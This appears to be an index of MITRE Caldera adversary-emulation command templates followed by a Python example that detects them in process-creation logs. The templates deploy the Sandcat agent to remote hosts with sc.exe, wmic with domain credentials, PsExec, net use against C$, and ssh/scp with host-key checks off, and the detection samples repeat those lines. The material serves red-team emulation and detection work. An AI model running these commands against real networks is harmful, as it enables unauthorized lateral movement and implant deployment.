stockpile 2afae782-6d0a-4fbd-a6b6-d1ce90090eac.yml Get-NetLocalGroupMember -ComputerName #{remote.host.fqdn} -Credential $credObject Apache-2.0
stockpile 2afae782-6d0a-4fbd-a6b6-d1ce90090eac.yml - source: remote.host.fqdn Apache-2.0
stockpile 2afae782-6d0a-4fbd-a6b6-d1ce90090eac.yml - source: remote.host.fqdn Apache-2.0
stockpile 3a2ce3d5-e9e2-4344-ae23-470432ff8687.yml nmap -sV -p #{remote.host.port} #{remote.host.ip} Apache-2.0
stockpile 47abe1f5-55a5-46cc-8cad-506dac8ea6d9.yml python3 scanner.py -i #{remote.host.ip} Apache-2.0
stockpile 47abe1f5-55a5-46cc-8cad-506dac8ea6d9.yml - source: remote.host.ip Apache-2.0
stockpile 47abe1f5-55a5-46cc-8cad-506dac8ea6d9.yml target: remote.host.port Apache-2.0
stockpile 5f77ecf9-613f-4863-8d2f-ed6b447a4633.yml name: Remote System Discovery Apache-2.0
stockpile 6d90e6fa-9324-4eb5-93be-9f737245bd7z.yml description: Use PowerView to query the Active Directory server to determine remote admins Apache-2.0
stockpile 6d90e6fa-9324-4eb5-93be-9f737245bd7z.yml Get-NetLocalGroupMember -ComputerName #{remote.host.fqdn} Apache-2.0
stockpile 6d90e6fa-9324-4eb5-93be-9f737245bd7z.yml - source: remote.host.fqdn Apache-2.0
stockpile 85341c8c-4ecb-4579-8f53-43e3e91d7617.yml name: Remote System Discovery Apache-2.0
stockpile 85341c8c-4ecb-4579-8f53-43e3e91d7617.yml - source: remote.host.ip Apache-2.0
stockpile 921055f4-5970-4707-909e-62f594234d91.yml name: Remote Host Ping Apache-2.0
stockpile 921055f4-5970-4707-909e-62f594234d91.yml description: Ping a remote host to see if it is accessible Apache-2.0
stockpile 921055f4-5970-4707-909e-62f594234d91.yml ping #{remote.host.fqdn} Apache-2.0
stockpile 921055f4-5970-4707-909e-62f594234d91.yml - source: remote.host.fqdn Apache-2.0
stockpile 921055f4-5970-4707-909e-62f594234d91.yml - source: remote.host.fqdn Apache-2.0
stockpile ce485320-41a4-42e8-a510-f5a8fe96a644.yml name: Remote System Discovery Apache-2.0
stockpile deeac480-5c2a-42b5-90bb-41675ee53c7e.yml name: View remote shares Apache-2.0
stockpile deeac480-5c2a-42b5-90bb-41675ee53c7e.yml description: View the shares of a remote host Apache-2.0
stockpile deeac480-5c2a-42b5-90bb-41675ee53c7e.yml command: net view \\#{remote.host.fqdn} /all Apache-2.0
stockpile deeac480-5c2a-42b5-90bb-41675ee53c7e.yml - source: remote.host.fqdn Apache-2.0
stockpile deeac480-5c2a-42b5-90bb-41675ee53c7e.yml target: remote.host.share Apache-2.0
stockpile fa4ed735-7006-4451-a578-b516f80e559f.yml description: Find hostname of remote IP in domain Apache-2.0
stockpile fa4ed735-7006-4451-a578-b516f80e559f.yml name: Remote System Discovery Apache-2.0
stockpile fa4ed735-7006-4451-a578-b516f80e559f.yml nslookup #{remote.host.ip} Apache-2.0
stockpile fa4ed735-7006-4451-a578-b516f80e559f.yml - source: remote.host.fqdn Apache-2.0
stockpile fa4ed735-7006-4451-a578-b516f80e559f.yml target: remote.host.ip Apache-2.0
stockpile fdf8bf36-797f-4157-805b-fe7c1c6fc903.yml description: Find hostname of remote host Apache-2.0
stockpile fdf8bf36-797f-4157-805b-fe7c1c6fc903.yml name: Remote System Discovery Apache-2.0
stockpile fdf8bf36-797f-4157-805b-fe7c1c6fc903.yml nbtstat -A #{remote.host.ip} Apache-2.0
stockpile 95727b87-175c-4a69-8c7a-a5d82746a753.yml description: Create a service named "sandsvc" to execute remote 54ndc57 binary named "s4ndc4t.exe" Apache-2.0
stockpile 95727b87-175c-4a69-8c7a-a5d82746a753.yml sc.exe \\#{remote.host.fqdn} stop sandsvc; Apache-2.0
stockpile 95727b87-175c-4a69-8c7a-a5d82746a753.yml sc.exe \\#{remote.host.fqdn} delete sandsvc /f; Apache-2.0
stockpile 95727b87-175c-4a69-8c7a-a5d82746a753.yml taskkill /s \\#{remote.host.fqdn} /FI "Imagename eq s4ndc4t.exe" Apache-2.0
stockpile 95727b87-175c-4a69-8c7a-a5d82746a753.yml sc.exe \\#{remote.host.fqdn} create sandsvc start= demand error= ignore binpath= "cmd /c start C:\Users\Public\s4ndc4t.exe -server #{server} -v -originLinkID #{origin_link_id}" displayname= "Sandcat Execution"; Apache-2.0
stockpile 95727b87-175c-4a69-8c7a-a5d82746a753.yml sc.exe \\#{remote.host.fqdn} start sandsvc; Apache-2.0
stockpile 95727b87-175c-4a69-8c7a-a5d82746a753.yml Get-Process -ComputerName #{remote.host.fqdn} s4ndc4t; Apache-2.0
stockpile 95727b87-175c-4a69-8c7a-a5d82746a753.yml - source: remote.host.fqdn Apache-2.0
stockpile ece5dde3-d370-4c20-b213-a1f424aa8d03.yml wmic /node:"#{remote.host.fqdn}" /user:"#{domain.user.name}" /password:"#{domain.user.password}" process call create "powershell.exe C:\Users\Public\s4ndc4t.exe -server #{server} -group #{group}"; Apache-2.0
stockpile ece5dde3-d370-4c20-b213-a1f424aa8d03.yml wmic /node:"#{remote.host.fqdn}" /user:"#{domain.user.name}" /password:"#{domain.user.password}" process call create "taskkill /f /im s4ndc4t.exe" Apache-2.0
stockpile ece5dde3-d370-4c20-b213-a1f424aa8d03.yml wmic /node:"#{remote.host.fqdn}" /user:"#{domain.user.name}" /password:"#{domain.user.password}" process call create "cmd.exe C:\Users\Public\s4ndc4t.exe -server #{server} -group #{group}"; Apache-2.0
stockpile ece5dde3-d370-4c20-b213-a1f424aa8d03.yml - source: remote.host.fqdn Apache-2.0
stockpile ece5dde3-d370-4c20-b213-a1f424aa8d03.yml - source: remote.host.fqdn Apache-2.0
stockpile ece5dde3-d370-4c20-b213-a1f424aa8d03.yml - source: remote.host.fqdn Apache-2.0
stockpile 10a9d979-e342-418a-a9b0-002c483e0fa6.yml description: Copy 54ndc47 to remote host and start it, assumes target uses SSH keys and passwordless authentication Apache-2.0
stockpile 10a9d979-e342-418a-a9b0-002c483e0fa6.yml name: "Remote Services: SSH" Apache-2.0
stockpile 10a9d979-e342-418a-a9b0-002c483e0fa6.yml scp -o StrictHostKeyChecking=no -o UserKnownHostsFile=/dev/null -o ConnectTimeout=3 sandcat.go-darwin #{remote.ssh.cmd}:~/sandcat.go && Apache-2.0
stockpile 10a9d979-e342-418a-a9b0-002c483e0fa6.yml ssh -o StrictHostKeyChecking=no -o UserKnownHostsFile=/dev/null -o ConnectTimeout=3 #{remote.ssh.cmd} 'nohup ./sandcat.go -server #{server} -group red 1>/dev/null 2>/dev/null &' Apache-2.0
stockpile 10a9d979-e342-418a-a9b0-002c483e0fa6.yml ssh -o ConnectTimeout=3 #{remote.ssh.cmd} 'pkill -f sandcat & rm -f ~/sandcat.go' Apache-2.0
stockpile 10a9d979-e342-418a-a9b0-002c483e0fa6.yml scp -o StrictHostKeyChecking=no -o UserKnownHostsFile=/dev/null -o ConnectTimeout=3 sandcat.go-linux #{remote.ssh.cmd}:~/sandcat.go && Apache-2.0
stockpile 10a9d979-e342-418a-a9b0-002c483e0fa6.yml ssh -o ConnectTimeout=3 -o StrictHostKeyChecking=no #{remote.ssh.cmd} 'pkill -f sandcat & rm -f ~/sandcat.go' Apache-2.0
stockpile 3734aa1e-c536-42b3-8912-4c91b8bdce90.yml name: "Remote Services: Windows Remote Management" Apache-2.0
stockpile 3734aa1e-c536-42b3-8912-4c91b8bdce90.yml -server $server -v" } -ComputerName #{remote.host.name} -ArgumentList $startServer, $sharePath, $name, $server Apache-2.0
stockpile 40161ad0-75bd-11e9-b475-0800200c9a66.yml name: "Remote Services: SMB/Windows Admin Shares" Apache-2.0
stockpile 40161ad0-75bd-11e9-b475-0800200c9a66.yml net use \\#{remote.host.ip}\c$ /user:#{domain.user.name} #{domain.user.password}; Apache-2.0
stockpile 40161ad0-75bd-11e9-b475-0800200c9a66.yml net use \\#{remote.host.ip}\c$ /delete; Apache-2.0
stockpile 41bb2b7a-75af-49fd-bd15-6c827df25921.yml name: "Remote Services: Windows Remote Management" Apache-2.0
stockpile 41bb2b7a-75af-49fd-bd15-6c827df25921.yml $session = New-PSSession -ComputerName #{remote.host.name} -Credential $cred; Apache-2.0
stockpile 4908fdc4-74fc-4d7c-8935-26d11ad26a8d.yml description: Copy 54ndc47 to remote host (powershell 5 or newer only) or SCP Apache-2.0
stockpile 4908fdc4-74fc-4d7c-8935-26d11ad26a8d.yml $session = New-PSSession -ComputerName "#{remote.host.name}" -Credential $cred; Apache-2.0
stockpile 4908fdc4-74fc-4d7c-8935-26d11ad26a8d.yml scp -o StrictHostKeyChecking=no -o UserKnownHostsFile=/dev/null -o ConnectTimeout=3 sandcat.go-darwin #{remote.ssh.cmd}:~/sandcat.go Apache-2.0
stockpile 4908fdc4-74fc-4d7c-8935-26d11ad26a8d.yml ssh -o ConnectTimeout=3 #{remote.ssh.cmd} 'rm -f sandcat.go' Apache-2.0
stockpile 4908fdc4-74fc-4d7c-8935-26d11ad26a8d.yml scp -o StrictHostKeyChecking=no -o UserKnownHostsFile=/dev/null -o ConnectTimeout=3 sandcat.go-linux #{remote.ssh.cmd}:~/sandcat.go Apache-2.0
stockpile 4908fdc4-74fc-4d7c-8935-26d11ad26a8d.yml ssh -o ConnectTimeout=3 -o StrictHostKeyChecking=no #{remote.ssh.cmd} 'rm -f sandcat.go' Apache-2.0
stockpile 620b674a-7655-436c-b645-bc3e8ea51abd.yml cleanup: del /f sandcat.go-windows && del /f \\#{remote.host.name}\Users\Public\sandcat.go-windows.exe Apache-2.0
stockpile 620b674a-7655-436c-b645-bc3e8ea51abd.yml net /y use \\#{remote.host.name} & copy /y sandcat.go-windows Apache-2.0
stockpile 620b674a-7655-436c-b645-bc3e8ea51abd.yml \\#{remote.host.name}\Users\Public & #{psexec.path} -accepteula \\#{remote.host.name} Apache-2.0
stockpile 65048ec1-f7ca-49d3-9410-10813e472b30.yml description: Copy 54ndc47 to remote host (SMB) Apache-2.0
stockpile 65048ec1-f7ca-49d3-9410-10813e472b30.yml name: "Remote Services: SMB/Windows Admin Shares" Apache-2.0
stockpile 65048ec1-f7ca-49d3-9410-10813e472b30.yml $drive = "\\#{remote.host.fqdn}\C$"; Apache-2.0
stockpile 65048ec1-f7ca-49d3-9410-10813e472b30.yml - source: remote.host.fqdn Apache-2.0
stockpile 65048ec1-f7ca-49d3-9410-10813e472b30.yml - source: remote.host.fqdn Apache-2.0
stockpile 65048ec1-f7ca-49d3-9410-10813e472b30.yml - source: remote.host.fqdn Apache-2.0
stockpile aa6ec4dd-db09-4925-b9b9-43adeb154686.yml name: "Remote Services: SMB/Windows Admin Shares" Apache-2.0
stockpile aa6ec4dd-db09-4925-b9b9-43adeb154686.yml net use \\#{remote.host.fqdn}\C$ /user:#{domain.user.name} #{domain.user.password} Apache-2.0
stockpile aa6ec4dd-db09-4925-b9b9-43adeb154686.yml net use \\#{remote.host.fqdn}\C$ /delete Apache-2.0
stockpile aa6ec4dd-db09-4925-b9b9-43adeb154686.yml - source: remote.host.fqdn Apache-2.0
stockpile aa6ec4dd-db09-4925-b9b9-43adeb154686.yml - source: remote.host.fqdn Apache-2.0
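The stockpile rows above are the offensive side: remote service creation with sc.exe, WMI process call create, PsExec, net use against C$ with a password on the command line, and scp/ssh with host-key checking disabled. The detection side a defender would pair with them is shown below as an added example; it is not code from Strontic, MITRE Caldera or signature-base. It runs a small rule set over process-creation command lines (Sysmon Event ID 1 / Security 4688 style), captures the remote target of each hit, redacts the cleartext passwords those commands carry before they are copied into an alert, and counts hits per target so that several techniques aimed at one host stand out. The sample command lines, host names, IPs and credentials are constructed, and the ATT&CK technique IDs attached to each rule are this example's own mapping.

```python
from __future__ import annotations

import re
from collections import Counter
from dataclasses import dataclass

# Constructed process-creation command lines (Sysmon EID 1 / Security 4688 style).
# The first three are benign; the rest are modelled on the stockpile abilities
# in the table above. Hosts, IPs and credentials are made up for this example.
SAMPLE_CMDLINES = [
    r'sc.exe query wuauserv',
    r'net use \\fileserver01\share /delete',
    r'ssh -o ConnectTimeout=3 ops@10.0.0.5 uptime',
    r'sc.exe \\ws02.corp.local create sandsvc start= demand error= ignore binpath= "cmd /c start C:\Users\Public\s4ndc4t.exe -server http://10.0.0.9:8888 -v" displayname= "Sandcat Execution"',
    r'wmic /node:"dc01.corp.local" /user:"CORP\svc_backup" /password:"Summer2024!" process call create "powershell.exe C:\Users\Public\s4ndc4t.exe -server http://10.0.0.9:8888 -group red"',
    r'net use \\10.0.0.7\c$ /user:CORP\svc_backup Summer2024!',
    r'C:\Tools\PsExec.exe -accepteula \\ws02.corp.local -s cmd /c C:\Users\Public\sandcat.go-windows.exe -server http://10.0.0.9:8888',
    r'scp -o StrictHostKeyChecking=no -o UserKnownHostsFile=/dev/null -o ConnectTimeout=3 sandcat.go-linux red@10.0.0.5:~/sandcat.go',
]

# (rule name, ATT&CK technique this example maps it to, pattern). The "host"
# group captures the remote target so hits can be pivoted on.
RULES = [
    ("sc_remote_service_create", "T1569.002",
     re.compile(r"\bsc(?:\.exe)?\s+\\\\(?P<host>[^\s\\]+)\s+create\b.*?\bbinpath=", re.I)),
    ("wmic_remote_process_create", "T1047",
     re.compile(r'\bwmic(?:\.exe)?\s+/node:"?(?P<host>[^\s"]+)"?.*?\bprocess\s+call\s+create\b', re.I)),
    ("net_use_admin_share_with_password", "T1021.002",
     re.compile(r"\bnet(?:\.exe)?\s+use\s+\\\\(?P<host>[^\s\\]+)\\(?:c|admin)\$\s+/user:\S+\s+\S+", re.I)),
    ("psexec_remote_exec", "T1569.002",
     re.compile(r"\bpsexec(?:\.exe)?\b.*?-accepteula\s+\\\\(?P<host>[^\s\\]+)", re.I)),
    ("ssh_hostkey_checking_disabled", "T1021.004",
     re.compile(r"\b(?:ssh|scp)\b(?=.*\bStrictHostKeyChecking=no\b).*?\s(?P<host>[\w.-]+@[\w.-]+)", re.I)),
]

# Passwords that ride along on these command lines must not be copied into alerts.
_SECRET_PATTERNS = [
    re.compile(r'(/password:)"?[^\s"]+"?', re.I),                          # wmic /password:...
    re.compile(r"(\bnet(?:\.exe)?\s+use\s+\S+\s+/user:\S+\s+)\S+", re.I),  # net use ... /user:X PASS
]


@dataclass(frozen=True)
class Finding:
    rule: str
    technique: str
    target: str      # remote host named in the command (user@ prefix stripped)
    cmdline: str     # redacted copy of the offending command line


def redact(cmdline: str) -> str:
    """Replace cleartext passwords in a command line with ***."""
    for rx in _SECRET_PATTERNS:
        cmdline = rx.sub(r"\1***", cmdline)
    return cmdline


def scan(cmdlines) -> list[Finding]:
    """Run every rule over every command line; one Finding per (line, rule) hit."""
    findings = []
    for line in cmdlines:
        for name, technique, rx in RULES:
            m = rx.search(line)
            if m:
                host = m.group("host").split("@")[-1]
                findings.append(Finding(name, technique, host, redact(line)))
    return findings


def hosts_touched(findings) -> dict[str, int]:
    """Count hits per remote target: several distinct techniques aimed at one
    host from one source is the pattern an analyst wants surfaced."""
    return dict(Counter(f.target for f in findings))


if __name__ == "__main__":
    hits = scan(SAMPLE_CMDLINES)
    for f in hits:
        print(f"{f.rule:36} {f.technique:10} -> {f.target}")
        print(f"    {f.cmdline}")
    print("targets:", hosts_touched(hits))
```

The teardown commands in the same abilities (sc.exe \\host stop/delete, taskkill /s \\host, ssh ... 'pkill -f sandcat & rm -f ~/sandcat.go') are deliberately not matched: on their own they look like routine administration, and the create/execute step is the higher-confidence signal. Note that the net use rule only fires when /user: and a password are present; a plain admin-share mount is too common to alert on by itself.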

MIT License. Copyright (c) 2020-2021 Strontic.